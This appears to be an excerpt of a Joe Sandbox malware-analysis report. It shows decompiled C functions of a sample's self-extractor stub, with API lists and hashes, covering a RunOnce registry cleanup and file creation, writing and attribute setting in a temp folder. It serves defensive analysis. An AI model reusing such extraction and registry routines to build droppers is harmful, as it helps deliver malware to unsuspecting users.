                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A0538C,?,?,00A0538C), ref: 00A02005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(00A0538C,wextract_cleanup1,?,?,00A0538C), ref: 00A02017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00A0538C,?,?,00A0538C), ref: 00A02020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                            • Opcode ID: cbf6af84ebb7282f31187c318c50327684f9a9b6aae31e5e59a2fe7cee857473
                                                                                                                                                                                                                                            • Instruction ID: d34927b9608cc98cbbfca24d866b875f840aeadf62ae4689dff50fa791d36dcc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbf6af84ebb7282f31187c318c50327684f9a9b6aae31e5e59a2fe7cee857473
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E01A31A5031CBBD7218FD0BC4AF597A2DF710741F100194BA05A00E0EB666E16D609
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A04CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0xa091d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E00A04E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E00A06CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0xa091e4;
                                                                                                                                                                                                                                            						_t58 = 0xa091e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0xa091e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa091e4;
                                                                                                                                                                                                                                            						_t30 = E00A04702( &_v268, 0xa091e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E00A0476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E00A04980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A047E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa093f4 =  *0xa093f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0xa091e4;
                                                                                                                                                                                                                                            						_t63 = 0xa091e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0xa091e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa091e4;
                                                                                                                                                                                                                                            						_t30 = E00A04702( &_v268, 0xa091e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E00A04C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E00A04B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E00A04B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                            0x00a04e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04e7d
                                                                                                                                                                                                                                            0x00a04d25
                                                                                                                                                                                                                                            0x00a04d25
                                                                                                                                                                                                                                            0x00a04d28
                                                                                                                                                                                                                                            0x00a04d36
                                                                                                                                                                                                                                            0x00a04d3b
                                                                                                                                                                                                                                            0x00a04d40
                                                                                                                                                                                                                                            0x00a04d40
                                                                                                                                                                                                                                            0x00a04d42
                                                                                                                                                                                                                                            0x00a04d43
                                                                                                                                                                                                                                            0x00a04d43
                                                                                                                                                                                                                                            0x00a04d47
                                                                                                                                                                                                                                            0x00a04d4a
                                                                                                                                                                                                                                            0x00a04d4a
                                                                                                                                                                                                                                            0x00a04d4c
                                                                                                                                                                                                                                            0x00a04d4f
                                                                                                                                                                                                                                            0x00a04d4f
                                                                                                                                                                                                                                            0x00a04d51
                                                                                                                                                                                                                                            0x00a04d52
                                                                                                                                                                                                                                            0x00a04d52
                                                                                                                                                                                                                                            0x00a04d56
                                                                                                                                                                                                                                            0x00a04d5b
                                                                                                                                                                                                                                            0x00a04d5d
                                                                                                                                                                                                                                            0x00a04d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d67
                                                                                                                                                                                                                                            0x00a04d6f
                                                                                                                                                                                                                                            0x00a04d74
                                                                                                                                                                                                                                            0x00a04d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d7c
                                                                                                                                                                                                                                            0x00a04d84
                                                                                                                                                                                                                                            0x00a04d89
                                                                                                                                                                                                                                            0x00a04d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d94
                                                                                                                                                                                                                                            0x00a04d99
                                                                                                                                                                                                                                            0x00a04d9e
                                                                                                                                                                                                                                            0x00a04da1
                                                                                                                                                                                                                                            0x00a04daa
                                                                                                                                                                                                                                            0x00a04daa
                                                                                                                                                                                                                                            0x00a04da3
                                                                                                                                                                                                                                            0x00a04da3
                                                                                                                                                                                                                                            0x00a04da3
                                                                                                                                                                                                                                            0x00a04db5
                                                                                                                                                                                                                                            0x00a04dbb
                                                                                                                                                                                                                                            0x00a04dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04dc3
                                                                                                                                                                                                                                            0x00a04dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04dc5
                                                                                                                                                                                                                                            0x00a04dbd
                                                                                                                                                                                                                                            0x00a04d2a
                                                                                                                                                                                                                                            0x00a04d2a
                                                                                                                                                                                                                                            0x00a04d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a04d2d
                                                                                                                                                                                                                                            0x00a04cf8
                                                                                                                                                                                                                                            0x00a04cfd
                                                                                                                                                                                                                                            0x00a04d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A04DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A04DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-3647970563
                                                                                                                                                                                                                                            • Opcode ID: e85bfd219978de065d579d24c21be9c6446e112cf51db12f1e5ea2e257d59949
                                                                                                                                                                                                                                            • Instruction ID: 03ef0053b40afaa4c08963c398b89880d1bc9137d68ff32d6185080062125b1c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e85bfd219978de065d579d24c21be9c6446e112cf51db12f1e5ea2e257d59949
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B4124B620020D9BCB219F38FE546F677A5FB4D300F044668EA86972D5DA31DE4AC750
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A04C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0xa08d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0xa08d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}









APIs
• DosDateTimeToFileTime.KERNEL32 ref: 00A04C54
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A04C66
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00A04C7E
Memory Dump Source
• Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
Similarity
• API ID: Time$File$DateLocal
• String ID:
• API String ID: 2071732420-0
• Opcode ID: 9b120f79ce121de6e9554e6deebcfe812d11d24364f90f25028b2212c938ad07
• Instruction ID: 49f3f1efc5e256133bf1039cb6e862d3181fb203f703783649c54d426df96276
• Opcode Fuzzy Hash: 9b120f79ce121de6e9554e6deebcfe812d11d24364f90f25028b2212c938ad07
• Instruction Fuzzy Hash: 6DF090B260120CAFEB64DFB4DC48DBB77ACFB18340B44462EAA16C10D0EA30D915C7A4
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A0487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A0490C(_t11);
                                                                                                                                                                                                                                            					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








APIs
• CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A04A23,?,00A04F67,*MEMCAB,00008000,00000180), ref: 00A048DE
• CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A04F67,*MEMCAB,00008000,00000180), ref: 00A04902
Memory Dump Source
• Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ac0f5c3a0520e3bf634ccbf5d0e3c8c9cb974524a586f3c209661174e4703a6c
• Instruction ID: 55a3f53f6cdcd018cf44c3dcc6b8ffe1217915edc45c49e2080b5644490b935a
• Opcode Fuzzy Hash: ac0f5c3a0520e3bf634ccbf5d0e3c8c9cb974524a586f3c209661174e4703a6c
• Instruction Fuzzy Hash: 83018BE3E116382AF32481686C88FB7451CEB9A730F1B4730BEAAE71C2D1644C0581E0
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A04AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				int _t12;
                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                                                                                            				signed int _t24;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 =  *0xa0858c; // 0xb8
                                                                                                                                                                                                                                            				_t9 = E00A03680(_t20);
                                                                                                                                                                                                                                            				if( *0xa091d8 == 0) {
                                                                                                                                                                                                                                            					_push(_t24);
                                                                                                                                                                                                                                            					_t12 = WriteFile( *(0xa08d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t25 = _a12;
                                                                                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            							_t14 =  *0xa09400; // 0xa4a00
                                                                                                                                                                                                                                            							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                            							 *0xa09400 = _t15;
                                                                                                                                                                                                                                            							if( *0xa08184 != 0) {
                                                                                                                                                                                                                                            								_t21 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa093f8, 0);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A03680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A0369F
                                                                                                                                                                                                                                              • Part of subcall function 00A03680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A036B2
                                                                                                                                                                                                                                              • Part of subcall function 00A03680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A036DA
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A04B05
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                            • Opcode ID: cac02e2ebbeb99937f51a8de118db4f31f437215eb32be863aed09ec46d7e2c8
                                                                                                                                                                                                                                            • Instruction ID: 628723ff076366351881e976bd0c66fd5c9855dcfdf30c02463cd70ed210d879
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cac02e2ebbeb99937f51a8de118db4f31f437215eb32be863aed09ec46d7e2c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38018C7160020DABDB14CFA8EC15BA27769BB48725F048325FA79AB1F1CB71D813CB94
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A0658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				intOrPtr _t4;
                                                                                                                                                                                                                                            				char* _t6;
                                                                                                                                                                                                                                            				char* _t8;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				char* _t16;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				char* _t19;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                                                                                            				_t10 = __edx;
                                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                                            				_t1 = _t17 + 1; // 0xa08b3f
                                                                                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t4 =  *_t17;
                                                                                                                                                                                                                                            					_t17 = _t17 + 1;
                                                                                                                                                                                                                                            				} while (_t4 != 0);
                                                                                                                                                                                                                                            				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                            				_t2 = _t18 + 1; // 0xa08b40
                                                                                                                                                                                                                                            				if(_t2 < __edx) {
                                                                                                                                                                                                                                            					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                            					if(_t19 > __ecx) {
                                                                                                                                                                                                                                            						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                            						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                            							 *_t19 = 0x5c;
                                                                                                                                                                                                                                            							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t6 = _a4;
                                                                                                                                                                                                                                            					 *_t19 = 0;
                                                                                                                                                                                                                                            					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                            						_t6 = _t6 + 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return E00A016B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0x8007007a;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a065cc
